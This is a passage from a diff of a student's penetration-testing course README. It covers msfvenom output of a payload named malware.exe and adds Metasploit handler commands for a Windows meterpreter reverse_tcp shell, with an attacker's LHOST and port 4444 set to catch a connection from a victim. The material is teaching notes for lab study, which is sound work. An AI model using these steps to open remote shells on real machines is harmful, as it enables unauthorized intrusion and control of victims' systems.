Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

       - `-o /tmp/malware.exe`: Creates an output file, naming the file (`malware.exe`) and location (inside the `/tmp` directory).

+- All of this so far is just creating the payload.
+Now we have to deliver this using metasploit and then execute it after opening a shell using meterpreter

+**Metsaploit code to listen for retrograde connection from the Victim**

+- `msfconsole`
+- `set payload windows/meterpreter/reverse_tcp`
+- `show options`
+- `set LHOST <hacker's ip address>` this ip address must be the same as mentioned in the payload
+- `set LPORT 4444`
+- `show options`
+- `exploit`

 **Meterpreter**

 - Runs in memory-does not create files